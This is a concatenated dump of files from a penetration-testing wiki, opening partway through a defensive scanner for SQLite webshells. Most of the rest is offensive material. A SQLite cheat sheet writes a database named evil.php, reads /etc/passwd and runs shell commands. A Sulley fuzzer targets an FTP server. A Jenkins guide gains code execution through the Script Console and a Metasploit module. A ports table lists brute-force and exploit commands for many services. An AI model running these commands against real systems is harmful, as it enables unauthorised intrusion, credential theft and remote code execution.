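            data = f.read()          # whole file; stream in chunks for huge DBs
    except OSError:
        return []                    # unreadable or vanished, skip it
    if not data.startswith(SQLITE_MAGIC):
        return []                    # not an SQLite file, out of scope here
    reasons = []
    ext = os.path.splitext(path)[1].lower()
    if ext in WEB_EXEC_EXT:
        reasons.append(f"SQLite header in web-executable file ({ext})")
    for marker in SCRIPT_MARKERS:
        if marker in data:
            reasons.append(f"script marker {marker.decode()!r} inside database pages")
            break
    return reasons


def scan_tree(root: str) -> List[Tuple[str, List[str]]]:
    """Walk root and return (relative path, reasons) for each suspicious file."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            reasons = classify_file(path)
            if reasons:
                hits.append((os.path.relpath(path, root).replace(os.sep, "/"), reasons))
    return sorted(hits)


def build_sample_tree(root: str) -> None:
    """Constructed fixture: a normal app database, a normal PHP page, and a
    file created the way the page does it (ATTACH/CREATE TABLE/INSERT), but
    holding a harmless marker string instead of a payload."""
    app = sqlite3.connect(os.path.join(root, "app.db"))
    app.execute("CREATE TABLE users (name TEXT)")
    app.execute("INSERT INTO users VALUES ('alice')")
    app.commit()
    app.close()
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo 'normal page'; ?>\n")
    os.makedirs(os.path.join(root, "uploads"))
    dropped = sqlite3.connect(os.path.join(root, "uploads", "evil.php"))
    dropped.execute("CREATE TABLE shell (code TEXT)")
    dropped.execute("INSERT INTO shell (code) VALUES (?)",
                    ("<?php echo 'constructed marker'; ?>",))
    dropped.commit()
    dropped.close()


def demo() -> List[Tuple[str, List[str]]]:
    """Build the fixture in a temp dir, scan it, and return the hits."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, reasons in demo():
        print(rel, "->", "; ".join(reasons))
```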
) 91 | 92 | ``` 93 | sqlite> select 1; -- comments 94 | 1 95 | sqlite> select 'hello ' || 'world'; 96 | hello world 97 | sqlite> select substr('hello world', 1, 3); 98 | hel 99 | sqlite> select hex('a'); 100 | 61 101 | sqlite> select quote(hex('a')); 102 | '61' 103 | sqlite> PRAGMA database_list; 104 | 0|main|/tmp/evil.php 105 | 2|pwn|/tmp/evil.php 106 | sqlite> PRAGMA temp_store_directory = '/tmp'; 107 | sqlite> 108 | 109 | ``` 110 | 111 | ---- 112 | 113 | ##READ FILE## 114 | 115 | ``` 116 | sqlite> 117 | sqlite> CREATE TABLE pwn.data (data TEXT); 118 | sqlite> .tables 119 | data pwn.data 120 | sqlite> .import /etc/passwd data 121 | sqlite> select * from data; 122 | root:x:0:0:root:/root:/bin/bash 123 | bin:x:1:1:bin:/bin:/usr/bin/nologin 124 | ...... 125 | ...... 126 | sqlite> .tables 127 | data pwn.data pwn.shell shell 128 | sqlite> DROP TABLE pwn.shell; 129 | ``` 130 | 131 | 132 | ---- 133 | 134 | ##WRITE FILE## 135 | 136 | ``` 137 | sqlite> ATTACH DATABASE '/tmp/evil.php' as pwn; 138 | sqlite> CREATE TABLE pwn.shell (code TEXT); 139 | sqlite> INSERT INTO pwn.shell (code) VALUES (''); 140 | sqlite> .quit 141 | ┌─[✗]─[lab@core]─[~/share/pentestlab/Darknet] 142 | └──╼ file /tmp/evil.php 143 | /tmp/evil.php: SQLite 3.x database 144 | ┌─[lab@core]─[~/share/pentestlab/Darknet] 145 | └──╼ strings /tmp/evil.php 146 | SQLite format 3 147 | Itableshellshell 148 | CREATE TABLE shell (code TEXT) 149 | 1 150 | ``` 151 | 152 | ---- 153 | 154 | ##COMMAND EXECUTION## 155 | 156 | ``` 157 | sqlite> .shell id 158 | uid=1000(lab) gid=1000(lab) groups=1000(lab) 159 | sqlite> .system id 160 | uid=1000(lab) gid=1000(lab) groups=1000(lab) 161 | 162 | ``` 163 | 164 | ---- 165 | 166 | #REFERENCES# 167 | 168 | http://www.tutorialspoint.com/sqlite/ 169 | http://atta.cked.me/home/sqlite3injectioncheatsheet 170 | -------------------------------------------------------------------------------- /2.Vulnerability-Assessment/Network-Assessment/Fuzzers/sulley/fuzz_PCManftpd32.py: 
-------------------------------------------------------------------------------- 1 | # Video 1 Practical Fuzzing Basic using the Sulley Framework 2 | # http://www.dfate.de/public/index.php/post/exploit-development-series-video-1-practical-fuzzing-basics-using-the-sulley-framework 3 | # https://www.exploit-db.com/exploits/37731/ 4 | 5 | # ------------------------------------------------------------------- 6 | # Usage: 7 | # C:\Fuzzing\sulley>python network_monitor.py -d 0 -f "port 21" -P audit 8 | # C:\Fuzzing\sulley>python process_monitor.py -c audit\pcmanftpd_crashbin -p "PCManFTPD2.exe" 9 | 10 | # ------------------------------------------------------------------- 11 | # Analysis: 12 | 13 | """ 14 | 220 PCMan's FTP Server 2.0 Ready. 15 | USER anonymous 16 | 331 User name okay, need password. 17 | PASS password12345 18 | 230 User logged in 19 | PORT 192,168,1,106,206,27 20 | 200 Command okay. 21 | STOR demo2.txt 22 | 150 File status okay; Open data connection. 23 | 226 Data Sent okay. 24 | PORT 192,168,1,106,206,28 25 | 200 Command okay. 26 | LIST 27 | 150 File status okay; Open data connection. 28 | 226 Data Sent okay. 29 | PORT 192,168,1,106,206,29 30 | 200 Command okay. 31 | RETR demo2.txt 32 | 150 File status okay; Open data connection. 33 | 226 Data Sent okay. 34 | QUIT 35 | """ 36 | 37 | from sulley import * 38 | 39 | # General Overview 40 | # 1. Create requests (define fuzzing grammar) 41 | # 2. Define sessions 42 | # 3. Define target 43 | # 4. Fuzz! 44 | 45 | # s_initialize - Construct a new request 46 | # s_static ("USER") - A string that is static (umutated) and does not get fuzzed 47 | # s_delin(" ") - A delimiter that can be fuzzed. Will have different mutations that using s_string 48 | # s_string("anonymous") - A string that will be mutated. 
Includes more mutations than s_delim 49 | 50 | # ------------------------------------------------------------------- 51 | # Grammar to be tested 52 | s_initialize("user") 53 | s_static("USER") 54 | s_delim(" ", fuzzable=False) 55 | s_string("anonymous") 56 | s_static("\r\n") 57 | 58 | s_initialize("pass") 59 | s_static("PASS") 60 | s_delim(" ", fuzzable=False) 61 | s_string("pass12345") 62 | s_static("\r\n") 63 | 64 | s_initialize("put") 65 | s_static("PUT") 66 | s_delim(" ", fuzzable=False) 67 | s_string("fuzz_strings") 68 | s_static("\r\n") 69 | 70 | s_initialize("stor") 71 | s_static("STOR") 72 | s_delim(" ", fuzzable=True) 73 | s_string("AAAA") 74 | s_static("\r\n") 75 | 76 | s_initialize("mkd") 77 | s_static("MKD") 78 | s_delim(" ", fuzzable=False) 79 | s_string("AAAA") 80 | s_static("\r\n") 81 | 82 | # ------------------------------------------------------------------- 83 | # Define pre_send function. Will be executed right after the three-way handshake 84 | def receive_ftp_banner(sock): 85 | data = sock.recv(1024) 86 | print(data) 87 | 88 | # ------------------------------------------------------------------- 89 | # Define session 90 | # Session parameters 91 | SESSION_FILENAME = "pcmanftpd-session" # Keeps track of the current fuzzing state 92 | SLEEP_TIME = 0.5 # Pause between two fuzzing attempts 93 | TIMEOUT = 5 # Fuzzer will time out after 5 seconds of no connection 94 | CRASH_THRESHOLD = 4 # After 4 crashes parameter will be skipped 95 | 96 | mysession = sessions.session( 97 | session_filename=SESSION_FILENAME, 98 | sleep_time=SLEEP_TIME, 99 | timeout=TIMEOUT, 100 | crash_threshold=CRASH_THRESHOLD) 101 | 102 | mysession.pre_send = receive_ftp_banner 103 | mysession.connect(s_get("user")) 104 | mysession.connect(s_get("user"), s_get("pass")) 105 | mysession.connect(s_get("pass"), s_get("stor")) 106 | mysession.connect(s_get("pass"), s_get("mkd")) 107 | mysession.connect(s_get("pass"), s_get("put")) 108 | 109 | # 
# Draw graph representing the fuzzing paths.
with open("session_test.udg", "w+") as f:
    f.write(mysession.render_graph_udraw())

# -------------------------------------------------------------------
# Just some overview output. s_num_mutations() counts the request defined
# last ("mkd"); multiplying by 5 is only an estimate, because "stor" also
# fuzzes its delimiter and therefore has more cases.

print("Number of mutations for one request: %s\n" % str(s_num_mutations()))
print("Total number of mutations (approx.): %s\n" % str(s_num_mutations() * 5))

decision = raw_input("Do you want to continue?(y/n): ")
if decision == "n":
    exit()

# -------------------------------------------------------------------
# Define target parameters
host = "192.168.1.107"
ftp_port = 21
netmon_port = 26001
procmon_port = 26002
target = sessions.target(host, ftp_port)
target.procmon = pedrpc.client(host, procmon_port)
target.netmon = pedrpc.client(host, netmon_port)

# The process monitor restarts the daemon after each crash with these commands;
# the crash bin named on its command line collects the register and stack dumps.
target.procmon_options = {
    "proc_name": "pcmanftpd2.exe",
    "stop_commands": ["wmic process where (name='PCManFTPD2.exe') call terminate"],
    "start_commands": ["C:\\PCManFTP\\PCManFTPD2.exe"]
}

# Add target to the session
mysession.add_target(target)

# -------------------------------------------------------------------
# Let's get rolling

print("Starting fuzzing now")
mysession.fuzz()

# Starts the fuzzing process and
# also the web interface (http://127.0.0.1:26000) to see the current state
--------------------------------------------------------------------------------
/2.Vulnerability-Assessment/Network-Assessment/Jenkins/Jenkins_hacking.md:
--------------------------------------------------------------------------------
**Authors**: < [nixawk](https://github.com/nixawk) >


# Jenkins Hacking

1. How to deploy jenkins ?
2. How to exploit jenkins server ?


Jenkins is a self-contained, open source automation server which can be used to automate all sorts of tasks such as building, testing, and deploying software. Jenkins can be installed through native system packages, Docker, or even run standalone by any machine with the Java Runtime Environment installed.


## How to deploy jenkins ?

This guided tour uses the "standalone" Jenkins distribution, which requires a minimum of Java 7, though Java 8 is recommended. A system with more than 512MB of RAM is also recommended.

1. [Download Jenkins](http://mirrors.jenkins.io/war-stable/latest/jenkins.war).
2. Open a terminal in the download directory and run `java -jar jenkins.war`.
3. Browse to http://localhost:8080 and follow the instructions to complete the installation.
4. Many Pipeline examples require Docker installed on the same computer as Jenkins.

The install log looks like this; note the generated initial admin password and the file it is written to, and that the HTTP connector binds to 0.0.0.0:8080, so the unfinished setup wizard is reachable from every interface.

```
root@lab:~/Downloads# java -jar jenkins.war
Running from: /root/Downloads/jenkins.war
webroot: $user.home/.jenkins
Mar 15, 2017 5:03:49 AM Main deleteWinstoneTempContents
WARNING: Failed to delete the temporary Winstone file /tmp/winstone/jenkins.war
Mar 15, 2017 5:03:50 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: Logging initialized @6168ms
Mar 15, 2017 5:03:50 AM winstone.Logger logInternal
INFO: Beginning extraction from war file
Mar 15, 2017 5:04:05 AM org.eclipse.jetty.util.log.JavaUtilLog warn
WARNING: Empty contextPath
Mar 15, 2017 5:04:06 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: jetty-9.2.z-SNAPSHOT
Mar 15, 2017 5:04:10 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: NO JSP Support for /, did not find org.eclipse.jetty.jsp.JettyJspServlet
Jenkins home directory: /root/.jenkins found at: $user.home/.jenkins
Mar 15, 2017 5:04:20 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: Started w.@30990c1b{/,file:/root/.jenkins/war/,AVAILABLE}{/root/.jenkins/war} 43 | Mar 15, 2017 5:04:20 AM org.eclipse.jetty.util.log.JavaUtilLog info 44 | INFO: Started ServerConnector@54227100{HTTP/1.1}{0.0.0.0:8080} 45 | Mar 15, 2017 5:04:20 AM org.eclipse.jetty.util.log.JavaUtilLog info 46 | INFO: Started @36602ms 47 | Mar 15, 2017 5:04:20 AM winstone.Logger logInternal 48 | INFO: Winstone Servlet Engine v2.0 running: controlPort=disabled 49 | Mar 15, 2017 5:04:22 AM jenkins.InitReactorRunner$1 onAttained 50 | INFO: Started initialization 51 | Mar 15, 2017 5:04:23 AM jenkins.InitReactorRunner$1 onAttained 52 | INFO: Listed all plugins 53 | Mar 15, 2017 5:04:45 AM jenkins.InitReactorRunner$1 onAttained 54 | INFO: Prepared all plugins 55 | Mar 15, 2017 5:04:45 AM jenkins.InitReactorRunner$1 onAttained 56 | INFO: Started all plugins 57 | Mar 15, 2017 5:04:45 AM jenkins.InitReactorRunner$1 onAttained 58 | INFO: Augmented all extensions 59 | Mar 15, 2017 5:04:51 AM jenkins.InitReactorRunner$1 onAttained 60 | INFO: Loaded all jobs 61 | Mar 15, 2017 5:04:51 AM hudson.model.AsyncPeriodicWork$1 run 62 | INFO: Started Download metadata 63 | Mar 15, 2017 5:04:52 AM org.jenkinsci.main.modules.sshd.SSHD start 64 | INFO: Started SSHD at port 43731 65 | Mar 15, 2017 5:04:53 AM jenkins.InitReactorRunner$1 onAttained 66 | INFO: Completed initialization 67 | Mar 15, 2017 5:04:55 AM org.springframework.context.support.AbstractApplicationContext prepareRefresh 68 | INFO: Refreshing org.springframework.web.context.support.StaticWebApplicationContext@4d8c4701: display name [Root WebApplicationContext]; startup date [Wed Mar 15 05:04:55 EDT 2017]; root of context hierarchy 69 | Mar 15, 2017 5:04:55 AM org.springframework.context.support.AbstractApplicationContext obtainFreshBeanFactory 70 | INFO: Bean factory for application context [org.springframework.web.context.support.StaticWebApplicationContext@4d8c4701]: 
org.springframework.beans.factory.support.DefaultListableBeanFactory@16f7f485 71 | Mar 15, 2017 5:04:55 AM org.springframework.beans.factory.support.DefaultListableBeanFactory preInstantiateSingletons 72 | INFO: Pre-instantiating singletons in org.springframework.beans.factory.support.DefaultListableBeanFactory@16f7f485: defining beans [authenticationManager]; root of factory hierarchy 73 | Mar 15, 2017 5:04:58 AM org.springframework.context.support.AbstractApplicationContext prepareRefresh 74 | INFO: Refreshing org.springframework.web.context.support.StaticWebApplicationContext@1aa6a1d4: display name [Root WebApplicationContext]; startup date [Wed Mar 15 05:04:58 EDT 2017]; root of context hierarchy 75 | Mar 15, 2017 5:04:58 AM org.springframework.context.support.AbstractApplicationContext obtainFreshBeanFactory 76 | INFO: Bean factory for application context [org.springframework.web.context.support.StaticWebApplicationContext@1aa6a1d4]: org.springframework.beans.factory.support.DefaultListableBeanFactory@26dbd965 77 | Mar 15, 2017 5:04:58 AM org.springframework.beans.factory.support.DefaultListableBeanFactory preInstantiateSingletons 78 | INFO: Pre-instantiating singletons in org.springframework.beans.factory.support.DefaultListableBeanFactory@26dbd965: defining beans [filter,legacy]; root of factory hierarchy 79 | Mar 15, 2017 5:04:59 AM jenkins.install.SetupWizard init 80 | INFO: 81 | 82 | ************************************************************* 83 | ************************************************************* 84 | ************************************************************* 85 | 86 | Jenkins initial setup is required. An admin user has been created and a password generated. 
87 | Please use the following password to proceed to installation: 88 | 89 | e019dca34bac4a30beca67b53e821f35 90 | 91 | This may also be found at: /root/.jenkins/secrets/initialAdminPassword 92 | 93 | ************************************************************* 94 | ************************************************************* 95 | ************************************************************* 96 | 97 | Mar 15, 2017 5:05:06 AM hudson.model.UpdateSite updateData 98 | INFO: Obtained the latest update center data file for UpdateSource default 99 | Mar 15, 2017 5:05:09 AM hudson.model.DownloadService$Downloadable load 100 | INFO: Obtained the updated data file for hudson.tasks.Maven.MavenInstaller 101 | Mar 15, 2017 5:05:09 AM hudson.model.UpdateSite updateData 102 | INFO: Obtained the latest update center data file for UpdateSource default 103 | Mar 15, 2017 5:05:10 AM hudson.WebAppMain$3 run 104 | INFO: Jenkins is fully up and running 105 | Mar 15, 2017 5:05:10 AM javax.jmdns.impl.HostInfo newHostInfo 106 | WARNING: Could not intialize the host network interface on nullbecause of an error: lab: lab: Temporary failure in name resolution 107 | java.net.UnknownHostException: lab: lab: Temporary failure in name resolution 108 | at java.net.InetAddress.getLocalHost(InetAddress.java:1505) 109 | at javax.jmdns.impl.HostInfo.newHostInfo(HostInfo.java:75) 110 | at javax.jmdns.impl.JmDNSImpl.(JmDNSImpl.java:407) 111 | at javax.jmdns.JmDNS.create(JmDNS.java:60) 112 | at hudson.DNSMultiCast$1.call(DNSMultiCast.java:33) 113 | at jenkins.util.ContextResettingExecutorService$2.call(ContextResettingExecutorService.java:46) 114 | at java.util.concurrent.FutureTask.run(FutureTask.java:266) 115 | at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) 116 | at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) 117 | at java.lang.Thread.run(Thread.java:745) 118 | Caused by: java.net.UnknownHostException: lab: Temporary failure in 
name resolution
        at java.net.Inet6AddressImpl.lookupAllHostAddr(Native Method)
        at java.net.InetAddress$2.lookupAllHostAddr(InetAddress.java:928)
        at java.net.InetAddress.getAddressesFromNameService(InetAddress.java:1323)
        at java.net.InetAddress.getLocalHost(InetAddress.java:1500)
        ... 9 more

Mar 15, 2017 5:05:18 AM hudson.model.DownloadService$Downloadable load
INFO: Obtained the updated data file for hudson.tools.JDKInstaller
Mar 15, 2017 5:05:18 AM hudson.model.AsyncPeriodicWork$1 run
INFO: Finished Download metadata. 27,508 ms


```

Note the generated password: the setup wizard cannot be completed without it, and anyone who can read the log or `/root/.jenkins/secrets/initialAdminPassword` can finish the setup as the new admin.

```
Jenkins initial setup is required. An admin user has been created and a password generated.
Please use the following password to proceed to installation:

e019dca34bac4a30beca67b53e821f35
```

## How to exploit jenkins server ?

Browse to http://127.0.0.1:8080/script: the Script Console executes arbitrary Groovy inside the Jenkins JVM, as the account the service runs under, so reaching it is code execution on the server. It is available to anyone holding Overall/Administer (older releases had a separate Overall/RunScripts permission), and to unauthenticated users when security is disabled or the authorization strategy lets anyone do anything. Jenkins' own description:

> Script Console

> Type in an arbitrary Groovy script and execute it on the server. Useful for trouble-shooting and diagnostics. Use the ‘println’ command to see the output (if you use System.out, it will go to the server’s stdout, which is harder to see.)


### **execmd.groovy**

**execmd.groovy** executes an OS command on the Jenkins server and returns its output (Groovy comments are `//`; a `#` line is only valid as a shebang on line 1):

```
// Windows

println "cmd.exe /c dir".execute().text


// Linux

println "uname -a".execute().text

```

### **writefile.groovy**

**writefile.groovy** writes a string into a file on the Jenkins server; the file is owned by the Jenkins service account.

```
new File("/tmp/test.sh").write("""
echo "123"
echo "456"
""")
```

If you prefer [metasploit-framework](https://github.com/rapid7/metasploit-framework), `exploit/multi/http/jenkins_script_console` posts the Groovy for you; USERNAME and PASSWORD are optional, for instances with security disabled:

```
msf > use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > show options

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   password         no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.100    yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /                yes       The path to jenkins
   USERNAME   test             no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   1   Linux
msf exploit(jenkins_script_console) > exploit
```

Defensively: keep security enabled, grant Overall/Administer to as few accounts as possible, and treat every Script Console use as a privileged action worth auditing.


## References

1. https://jenkins.io/
--------------------------------------------------------------------------------
/2.Vulnerability-Assessment/Network-Assessment/Jenkins/execmd.groovy:
--------------------------------------------------------------------------------
// Windows

println "cmd.exe /c dir".execute().text


// Linux

println "uname -a".execute().text
--------------------------------------------------------------------------------
/2.Vulnerability-Assessment/Network-Assessment/Jenkins/writefile.groovy:
--------------------------------------------------------------------------------
new File("/tmp/test.sh").write("""
echo "123"
echo "456"
""")
--------------------------------------------------------------------------------
/2.Vulnerability-Assessment/OS-Assessment/OSX/README.md:
--------------------------------------------------------------------------------
**Authors**: < [nixawk](https://github.com/nixawk) >

## OSX Security

1. [macOS-Security-and-Privacy-Guide](https://github.com/drduh/macOS-Security-and-Privacy-Guide)
2. [mOSL](https://github.com/0xmachos/mOSL)
--------------------------------------------------------------------------------
/2.Vulnerability-Assessment/README.md:
--------------------------------------------------------------------------------
**Authors**: < [nixawk](https://github.com/nixawk) >, < [sjas](https://github.com/sjas) >

----

# Vulnerability Assessment

Having identified the most viable attack methods, you need to consider how you will access the target. During vulnerability analysis, you combine the information that you’ve learned from the prior phases and use it to understand what attacks might be viable. Among other things, vulnerability analysis takes into account port and vulnerability scans, data gathered by banner grabbing, and information collected during intelligence gathering.

|**Assessment Category**|**Bookmarks**|
|:----------------------|:------------|
|Network Assessment||
|Web Application Assessment||
|Database Assessment||


# Links

1. http://www.exploit-db.com/
2. http://www.cvedetails.com/
3. http://packetstormsecurity.com/
4. http://www.securityfocus.com/bid
5. http://nvd.nist.gov/
6. http://osvdb.org/
7. http://cve.mitre.org/
8. http://sec.jetlib.com/
9. http://0day.today/
10. https://www.seebug.org/
11. https://www.rapid7.com/db/
12. http://zerodayinitiative.com/advisories/published/
13. http://exploitsearch.net/
14. http://nvd.nist.gov/download/nvd-rss-analyzed.xml
15. http://www.intelligentexploit.com/
16. https://wpvulndb.com/
17. http://www.wordpressexploit.com/
18. http://www.drupalexploit.com/
19. http://www.openwall.com/lists/oss-security/
20. https://www.vulnerability-lab.com/
--------------------------------------------------------------------------------
/3.Exploitation-Tools/Network-Exploitation/ports_number.md:
--------------------------------------------------------------------------------
**Authors**: < [nixawk](https://github.com/nixawk) >

----

# Ports

|**Port Number**|**Protocol**|**Service & Application**|**Commands**|
|:--------------|:-----------|:------------------------|:-----------|
|1|tcp|blackice||
|7|tcp|echo||
|11|tcp|systat||
|13|tcp|daytime||
|15|tcp|netstat||
|17|tcp|quote of the day||
|19|tcp|character generator||
|21|tcp|ftp|nmap --script ftp-anon `target`|
|22|tcp|ssh|msf > use auxiliary/scanner/ssh/ssh_login<br>nmap --script ssh2-enum-algos 192.168.108.197<br>nmap --script ssh-hostkey 192.168.108.197<br>nmap --script sshv1 192.168.108.197|
|23|tcp|telnet|msf > use auxiliary/scanner/telnet/telnet_login<br>nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s `target`<br>nmap -p 23 --script telnet-encryption `target`<br>nmap -p 23 --script telnet-ntlm-info `target`|
|25|tcp|smtp|nmap -p 25 --script smtp-brute `target`<br>nmap --script smtp-commands.nse [--script-args smtp-commands.domain=`domain`] -pT:25,465,587 `target`<br>nmap -p 25,465,587 --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=domain.com `target`<br>nmap --script smtp-open-relay.nse [--script-args smtp-open-relay.domain=`domain`,smtp-open-relay.ip=`address`,...] -p 25,465,587 `target`<br>nmap --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 `target`<br>nmap --script=smtp-vuln-cve2010-4344 --script-args="exploit.cmd='uname -a'" -pT:25,465,587 `target`<br>nmap --script=smtp-vuln-cve2011-1720 --script-args='smtp.domain=`domain`' -pT:25,465,587 `target`<br>nmap --script=smtp-vuln-cve2011-1764 -pT:25,465,587 `target`|
|26|tcp|ssh||
|37|tcp|rdate||
|49|tcp|TACACS+||
|53|tcp|dns||
|53|udp|dns||
|67|udp|DHCP||
|68|udp|dhclient||
|69|udp|TFTP,BitTorrent||
|70|tcp|Gopher||
|79|tcp|Finger||
|80|tcp|HTTP,malware||
|81|tcp|HTTP,malware||
|82|tcp|HTTP,malware||
|83|tcp|HTTP||
|84|tcp|HTTP||
|88|tcp|Kerberos|msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum|
|102|tcp|Siemens S7||
|110|tcp|pop3||
|111|tcp|RPC|rpcinfo -p 192.168.1.111<br>msf > use auxiliary/scanner/nfs/nfsmount|
|119|tcp|NNTP||
|123|tcp|NTP||
|123|udp|ntp|ntpdc -n -c monlist `target`<br>nmap -sU -p 123 -Pn -n --script ntp-info `target`<br>nmap -sU -p 123 -Pn -n --script ntp-monlist `target`<br>msf > use auxiliary/scanner/ntp/ntp_readvar|
|137|udp|NetBIOS name service|nbtscan -A `target`|
|143|tcp|IMAP||
|161|udp|snmp|snmpcheck -p 161 -c public -t `target`<br>snmpwalk -v1 -c public `target`<br>msf > use auxiliary/scanner/snmp/snmp_enum|
|175|tcp|IBM Network Job Entry||
|179|tcp|BGP||
|195|tcp|TA14-353a||
|311|tcp|OS X Server Manager||
|389|tcp|ldap|ldap://`target`/dc=com|
|443|tcp|https|openssl s_client -host www.yahoo.com -port 443<br>sslscan www.yahoo.com<br>tlssled www.yahoo.com 443<br>nmap --script sslv2 www.yahoo.com<br>nmap --script ssl-cert www.yahoo.com<br>nmap --script ssl-date www.yahoo.com<br>nmap --script ssl-enum-ciphers www.yahoo.com<br>nmap --script ssl-google-cert-catalog www.yahoo.com<br>msf > use auxiliary/pro/web_ssl_scan<br>msf > use auxiliary/scanner/ssl/openssl_heartbleed<br>msf > use auxiliary/server/openssl_heartbeat_client_memory|
|445|tcp|Microsoft-DS Active Directory, Windows shares<br>Microsoft-DS SMB file sharing|smbclient -U root -L `target`<br>smbclient -U root //`target`/tmp<br>rpcclient -U "" `target`<br>msf > use auxiliary/admin/smb/samba_symlink_traversal|
|465|tcp|smtps||
|500|udp|ike||
|502|tcp|modbus||
|503|tcp|modbus||
|512|tcp|exec (rexec)||
|513|tcp|login (rlogin)||
|514|tcp|shell (rsh)||
|515|tcp|Line Printer Daemon||
|520|udp|RIP||
|523|tcp|IBM DB2||
|554|tcp|RTSP||
|587|tcp|SMTP mail submission||
|623|tcp|IPMI||
|626|tcp|OS X serialnumbered||
|631|tcp|CUPS||
|636|tcp|ldaps||
|771|tcp|Realport||
|789|tcp|Redlion Crimson3||
|873|tcp|rsync|rsync -a user@host::tools/<br>nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' `target`<br>nmap -p 873 --script rsync-list-modules `target`<br>msf > use auxiliary/scanner/rsync/modules_list|
|902|tcp|VMware authentication||
|992|tcp|Telnet(secure)||
|993|tcp|IMAPs||
|995|tcp|POP3s||
|1023|tcp|telnet||
|1025|tcp|Kamstrup||
|1099|tcp|Java Remote Method Invocation|msf > use exploit/multi/misc/java_rmi_server|
|1194|tcp|openvpn||
|1200|tcp|Codesys||
|1202|tcp|linknat||
|1234|udp|udpxy||
|1434|udp|MS-SQL monitor||
|1604||Citrix, malware||
|1723|tcp|pptp|thc-pptp-bruter -v -u `username` -n 4 `target` < pass.txt|
|1741||CiscoWorks||
|1883||MQTT||
|1900|tcp|bes,UPnP||
|1911||Niagara Fox||
|1962||PCworx||
|2000||iKettle,MikroTik bandwidth test||
|2049|tcp|nfs|showmount --all `target`<br>showmount --exports `target`<br>mount -t nfs `target`:/ /mnt/nfs/|
|2082|tcp|cpanel||
|2083|tcp|cpanel||
|2086||WHM||
|2087||WHM||
|2121|tcp|ftp|msf > use auxiliary/scanner/ftp/ftp_login|
|2123||GTPv1||
|2152||GTPv1||
|2182||Apache Zookeeper||
|2222|tcp|SSH, PLC5, EtherNet/IP||
|2323|tcp|telnet||
|2332|tcp|Sierra Wireless (telnet)||
|2375||Docker||
|2376||Docker||
|2404||IEC-104||
|2455||CoDeSys||
|2480||OrientDB||
|2628||Dictionary||
|3000||ntop||
|3128|tcp|squid||
|3299|tcp|sap|msf > use auxiliary/scanner/sap/sap_router_portscanner|
|3306|tcp|mysql|msf > use auxiliary/scanner/mysql/mysql_login<br>nmap --script mysql-brute `target`<br>nmap --script mysql-databases `target`<br>nmap -p 3306 --script mysql-dump-hashes --script-args='username=`username`,password=`password`' `target`<br>nmap -p 3306 --script mysql-enum `target`<br>nmap -p 3306 --script mysql-users `target`<br>nmap -p 3306 --script mysql-query --script-args='query="`query`"[,username=`username`,password=`password`]' `target`|
|3310|tcp|ClamAV||
|3386||GTPv1||
|3388||RDP||
|3389||RDP||
|3541||PBX GUI||
|3542||PBX GUI||
|3632|tcp|distccd|msf > use exploit/unix/misc/distcc_exec|
|3689||DACP||
|3780||Metasploit||
|3787||Ventrilo||
|4022||udpxy||
|4070||VertX/Edge door controller||
|4369|tcp|Erlang Port Mapper Daemon|nmap -p 4369 --script epmd-info `target`|
|4440|tcp|rundeck||
|4500||IKE NAT-T (VPN)||
|4567||Modem web interface||
|4800||Moxa NPort||
|4911||Niagara Fox with SSL||
|4949||Munin||
|5006||MELSEC-Q||
|5007||MELSEC-Q||
|5008||NetMobility||
|5009||Apple AirPort Administrator||
|5038|tcp|Asterisk Call Manager|http://code.google.com/p/sipvicious/<br><br>$ ncat -v 192.168.108.196 5038<br>Ncat: Version 6.47 ( http://nmap.org/ncat )<br>Ncat: Connected to 192.168.108.196:5038.<br>Asterisk Call Manager/1.1<br>action: login<br>username: admin<br>secret: amp111<br><br>Response: Success<br>Message: Authentication accepted<br>action: command<br>command: core show help|
|5060|udp|sip|msf > use auxiliary/scanner/sip/options|
|5222||XMPP||
|5269||XMPP Server to Server||
|5353||mDNS||
|5357||Microsoft-HTTP API/2.0||
|5432|tcp|postgresql||
|5555|tcp|hp data protector|msf > use exploit/windows/misc/hp_dataprotector_cmd_exec|
|5577||Flux LED||
|5601|tcp|kibana||
|5632||PCAnywhere||
|5672||RabbitMQ||
|5900|tcp|vnc|msf > use auxiliary/scanner/vnc/vnc_none_auth<br>msf > use auxiliary/scanner/vnc/vnc_login<br>msf > use exploit/multi/vnc/vnc_keyboard_exec<br>nmap --script vnc-brute -p 5900 `target`<br>nmap --script vnc-info -p 5900 `target`|
|5901||vnc||
|5938||TeamViewer||
|5984||CouchDB||
|5985|tcp|winrm|msf > use exploit/windows/winrm/winrm_script_exec<br>msf > use auxiliary/scanner/winrm/winrm_auth_methods<br>msf > use auxiliary/scanner/winrm/winrm_cmd<br>msf > use auxiliary/scanner/winrm/winrm_login<br>msf > use auxiliary/scanner/winrm/winrm_wql|
|6000|tcp|x11|xwd -root -screen -silent -display 192.168.1.108:0 > out.xwd<br>convert out.xwd out.png|
|6082|tcp|varnish||
|6379|tcp|redis|redis-cli -h 127.0.0.1 -p 6379<br>msf > use auxiliary/scanner/redis/file_upload<br>msf > use auxiliary/scanner/redis/redis_login<br>msf > use auxiliary/scanner/redis/redis_server|
|6380|tcp|redis||
